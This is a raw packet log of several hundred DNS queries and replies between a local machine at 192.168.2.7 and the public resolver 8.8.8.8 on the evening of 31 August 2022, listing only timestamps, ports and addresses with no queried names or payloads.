Aug 31, 2022 23:49:03.646867990 CEST	53	53336	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:03.674020052 CEST	53337	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:03.693329096 CEST	53	53337	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:03.694333076 CEST	53338	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:03.714029074 CEST	53	53338	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:03.720004082 CEST	53339	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:03.739958048 CEST	53	53339	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:03.740943909 CEST	53340	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:03.760740042 CEST	53	53340	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:03.761473894 CEST	53341	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:03.780883074 CEST	53	53341	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:05.851566076 CEST	51007	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:05.927884102 CEST	53	51007	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:05.950356960 CEST	51008	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:05.969724894 CEST	53	51008	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:05.970412970 CEST	51009	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:05.988084078 CEST	53	51009	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:05.994076967 CEST	51010	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:06.013634920 CEST	53	51010	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:06.014112949 CEST	51011	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:06.033843040 CEST	53	51011	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:06.034482956 CEST	51012	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:06.052124023 CEST	53	51012	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:08.298588037 CEST	60765	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:08.332787037 CEST	53	60765	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:08.379491091 CEST	60766	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:08.396629095 CEST	53	60766	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:08.401062012 CEST	60767	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:08.420532942 CEST	53	60767	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:08.421091080 CEST	60768	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:08.438788891 CEST	53	60768	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:08.439529896 CEST	60769	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:08.459163904 CEST	53	60769	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:08.460036039 CEST	60770	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:08.479747057 CEST	53	60770	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:10.506968975 CEST	58283	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:10.541820049 CEST	53	58283	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:10.567323923 CEST	58284	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:10.586430073 CEST	53	58284	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:10.587711096 CEST	58285	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:10.607192039 CEST	53	58285	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:10.608211994 CEST	58286	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:10.627860069 CEST	53	58286	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:10.628422022 CEST	58287	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:10.646167040 CEST	53	58287	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:10.646821976 CEST	58288	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:10.664554119 CEST	53	58288	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:12.772886038 CEST	50024	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:12.801616907 CEST	53	50024	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:12.835031033 CEST	50025	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:12.852170944 CEST	53	50025	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:12.853058100 CEST	50026	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:12.872845888 CEST	53	50026	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:12.888247967 CEST	50027	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:12.907861948 CEST	53	50027	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:12.908519030 CEST	50028	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:12.926351070 CEST	53	50028	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:12.927716017 CEST	50029	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:12.945725918 CEST	53	50029	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:19.245435953 CEST	49516	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:19.313703060 CEST	53	49516	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:19.400525093 CEST	49517	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:19.419850111 CEST	53	49517	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:19.420770884 CEST	49518	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:19.440718889 CEST	53	49518	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:19.441392899 CEST	49519	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:19.460870028 CEST	53	49519	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:19.466649055 CEST	49520	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:19.487466097 CEST	53	49520	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:19.488183022 CEST	49521	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:19.506371021 CEST	53	49521	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:21.671026945 CEST	62679	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:22.201103926 CEST	53	62679	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:22.227818012 CEST	62680	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:22.246304989 CEST	53	62680	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:22.247181892 CEST	62681	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:22.266834021 CEST	53	62681	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:22.268040895 CEST	62682	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:22.287790060 CEST	53	62682	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:22.288384914 CEST	62683	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:22.305758953 CEST	53	62683	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:22.306534052 CEST	62684	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:22.324302912 CEST	53	62684	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:24.462853909 CEST	61392	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:25.454030037 CEST	61392	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:25.577943087 CEST	53	61392	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:25.622845888 CEST	52105	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:25.640170097 CEST	53	52105	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:25.641298056 CEST	52106	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:25.661083937 CEST	53	52106	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:25.661866903 CEST	52107	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:25.681529045 CEST	53	52107	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:25.704473972 CEST	52108	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:25.724030018 CEST	53	52108	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:25.724788904 CEST	52109	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:25.744210958 CEST	53	52109	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:25.991184950 CEST	53	61392	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:28.680964947 CEST	59006	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:28.717668056 CEST	53	59006	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:28.837111950 CEST	59007	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:28.856168985 CEST	53	59007	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:28.857135057 CEST	59008	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:28.877022028 CEST	53	59008	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:28.877621889 CEST	59009	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:28.895523071 CEST	53	59009	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:28.896074057 CEST	59010	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:28.913804054 CEST	53	59010	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:28.914361000 CEST	59011	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:28.934406996 CEST	53	59011	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:31.635144949 CEST	51139	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:32.217390060 CEST	53	51139	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:32.279234886 CEST	51140	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:32.296617031 CEST	53	51140	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:32.298424006 CEST	51141	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:32.318643093 CEST	53	51141	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:32.319798946 CEST	51142	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:32.339747906 CEST	53	51142	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:32.344158888 CEST	51143	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:32.364142895 CEST	53	51143	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:32.366090059 CEST	51144	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:32.385826111 CEST	53	51144	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:35.170795918 CEST	58784	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:35.200468063 CEST	53	58784	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:35.292376995 CEST	58785	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:35.311513901 CEST	53	58785	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:35.365431070 CEST	58786	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:35.384989977 CEST	53	58786	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:35.450532913 CEST	58787	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:35.468177080 CEST	53	58787	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:35.533596992 CEST	58788	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:35.551315069 CEST	53	58788	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:35.553153992 CEST	58789	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:35.570811987 CEST	53	58789	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:40.191965103 CEST	64608	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:41.208512068 CEST	64608	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:41.316941023 CEST	53	64608	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:41.362494946 CEST	64609	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:41.379674911 CEST	53	64609	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:41.382796049 CEST	64610	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:41.400392056 CEST	53	64610	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:41.401937962 CEST	64611	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:41.419595003 CEST	53	64611	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:41.420692921 CEST	64612	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:41.440679073 CEST	53	64612	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:41.441375971 CEST	64613	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:41.461257935 CEST	53	64613	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:42.919545889 CEST	53	64608	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:43.427385092 CEST	58746	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:43.962893009 CEST	53	58746	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:44.012053967 CEST	58747	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:44.031344891 CEST	53	58747	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:44.032896042 CEST	58748	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:44.050631046 CEST	53	58748	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:44.051137924 CEST	58749	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:44.070837975 CEST	53	58749	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:44.071934938 CEST	58750	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:44.091598988 CEST	53	58750	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:44.095608950 CEST	58751	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:44.115334988 CEST	53	58751	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:45.971837044 CEST	62433	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:47.004626036 CEST	62433	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:47.099487066 CEST	53	62433	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:47.139636993 CEST	62434	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:47.156781912 CEST	53	62434	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:47.157448053 CEST	62435	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:47.175007105 CEST	53	62435	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:47.175607920 CEST	62436	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:47.193625927 CEST	53	62436	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:47.194216967 CEST	62437	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:47.214102030 CEST	53	62437	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:47.214941025 CEST	62438	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:47.232800007 CEST	53	62438	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:47.542625904 CEST	53	62433	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:49.229926109 CEST	61248	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:49.484189034 CEST	53	61248	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:49.510601044 CEST	61249	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:49.529911995 CEST	53	61249	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:49.533186913 CEST	61250	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:49.551467896 CEST	53	61250	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:49.552383900 CEST	61251	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:49.572386980 CEST	53	61251	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:49.573700905 CEST	61252	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:49.593506098 CEST	53	61252	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:49.595768929 CEST	61253	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:49.613496065 CEST	53	61253	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:51.551908016 CEST	52750	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:52.563982010 CEST	52750	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:52.714204073 CEST	53	52750	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:52.762547016 CEST	64079	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:52.781574011 CEST	53	64079	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:52.783907890 CEST	64080	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:52.804019928 CEST	53	64080	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:52.807468891 CEST	64081	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:52.825433969 CEST	53	64081	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:52.826347113 CEST	64082	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:52.846256018 CEST	53	64082	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:52.867185116 CEST	64083	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:52.887599945 CEST	53	64083	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:53.688219070 CEST	53	52750	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:56.650087118 CEST	50231	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:58.274665117 CEST	53	50231	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:59.062505960 CEST	50231	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:59.107537985 CEST	50232	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:59.124644041 CEST	53	50232	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:59.147748947 CEST	53	50231	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:59.196489096 CEST	50233	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:59.216067076 CEST	53	50233	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:59.216727018 CEST	50234	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:59.234318972 CEST	53	50234	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:59.234950066 CEST	50235	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:59.252429962 CEST	53	50235	8.8.8.8	192.168.2.7
Aug 31, 2022 23:49:59.285144091 CEST	50236	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:49:59.305018902 CEST	53	50236	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:01.274703979 CEST	58514	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:01.393326044 CEST	53	58514	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:01.419277906 CEST	58515	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:01.436784029 CEST	53	58515	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:01.437741041 CEST	58516	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:01.455447912 CEST	53	58516	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:01.457930088 CEST	58517	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:01.476432085 CEST	53	58517	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:01.476938963 CEST	58518	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:01.494363070 CEST	53	58518	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:01.495297909 CEST	58519	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:01.515038967 CEST	53	58519	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:03.328814983 CEST	51436	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:03.356900930 CEST	53	51436	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:03.377331972 CEST	51437	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:03.394578934 CEST	53	51437	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:03.395466089 CEST	51438	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:03.413331032 CEST	53	51438	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:03.414505005 CEST	51439	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:03.434359074 CEST	53	51439	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:03.437869072 CEST	51440	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:03.457411051 CEST	53	51440	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:03.458729029 CEST	51441	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:03.476334095 CEST	53	51441	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:05.108340025 CEST	59053	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:05.684484959 CEST	53	59053	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:05.702292919 CEST	59054	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:05.721307993 CEST	53	59054	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:05.722794056 CEST	59055	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:05.742141962 CEST	53	59055	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:05.744185925 CEST	59056	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:05.761802912 CEST	53	59056	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:05.762356997 CEST	59057	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:05.781910896 CEST	53	59057	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:05.782380104 CEST	59058	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:05.799871922 CEST	53	59058	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:07.031923056 CEST	51945	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:08.021806955 CEST	51945	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:08.151724100 CEST	53	51945	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:08.167407990 CEST	51946	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:08.186973095 CEST	53	51946	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:08.189280033 CEST	51947	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:08.220877886 CEST	53	51947	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:08.221313000 CEST	51948	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:08.249907017 CEST	53	51948	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:08.251476049 CEST	51949	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:08.271193981 CEST	53	51949	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:08.274797916 CEST	51950	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:08.294326067 CEST	53	51950	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:09.698939085 CEST	53	51945	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:09.751842022 CEST	63187	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:10.289400101 CEST	53	63187	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:10.296859980 CEST	63188	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:10.315807104 CEST	53	63188	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:10.316380978 CEST	63189	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:10.335757971 CEST	53	63189	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:10.336236000 CEST	63190	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:10.353692055 CEST	53	63190	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:10.354216099 CEST	63191	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:10.371742964 CEST	53	63191	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:10.372925043 CEST	63192	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:10.390542984 CEST	53	63192	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:11.642780066 CEST	64760	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:12.630454063 CEST	64760	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:13.644061089 CEST	64760	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:13.730717897 CEST	53	64760	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:13.744646072 CEST	53638	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:13.763123989 CEST	53	53638	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:13.763932943 CEST	53639	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:13.783987999 CEST	53	53639	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:13.786206961 CEST	53640	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:13.806222916 CEST	53	53640	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:13.814013958 CEST	53641	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:13.831871986 CEST	53	53641	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:13.835822105 CEST	53642	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:13.855473995 CEST	53	53642	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:14.389233112 CEST	53	64760	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:14.867403984 CEST	53	64760	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:15.356404066 CEST	58343	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:15.432742119 CEST	53	58343	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:15.441741943 CEST	58344	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:15.458967924 CEST	53	58344	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:15.459965944 CEST	58345	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:15.479576111 CEST	53	58345	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:15.480093002 CEST	58346	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:15.500281096 CEST	53	58346	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:15.500714064 CEST	58347	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:15.520478964 CEST	53	58347	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:15.520885944 CEST	58348	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:15.540834904 CEST	53	58348	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:16.850531101 CEST	54192	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:17.425961018 CEST	53	54192	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:17.434011936 CEST	54193	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:17.451142073 CEST	53	54193	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:17.451853991 CEST	54194	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:17.469491005 CEST	53	54194	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:17.469830990 CEST	54195	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:17.487525940 CEST	53	54195	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:17.488065004 CEST	54196	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:17.507570982 CEST	53	54196	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:17.513889074 CEST	54197	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:17.533308029 CEST	53	54197	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:18.887698889 CEST	62018	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:18.916414976 CEST	53	62018	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:18.937438965 CEST	62019	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:18.954654932 CEST	53	62019	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:18.955250978 CEST	62020	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:18.974977016 CEST	53	62020	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:18.975379944 CEST	62021	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:18.994760036 CEST	53	62021	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:18.995398998 CEST	62022	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:19.012873888 CEST	53	62022	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:19.013875008 CEST	62023	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:19.031758070 CEST	53	62023	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:20.492069006 CEST	50155	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:20.563419104 CEST	53	50155	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:20.578113079 CEST	50156	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:20.595380068 CEST	53	50156	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:20.595863104 CEST	50157	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:20.615622997 CEST	53	50157	8.8.8.8	192.168.2.7
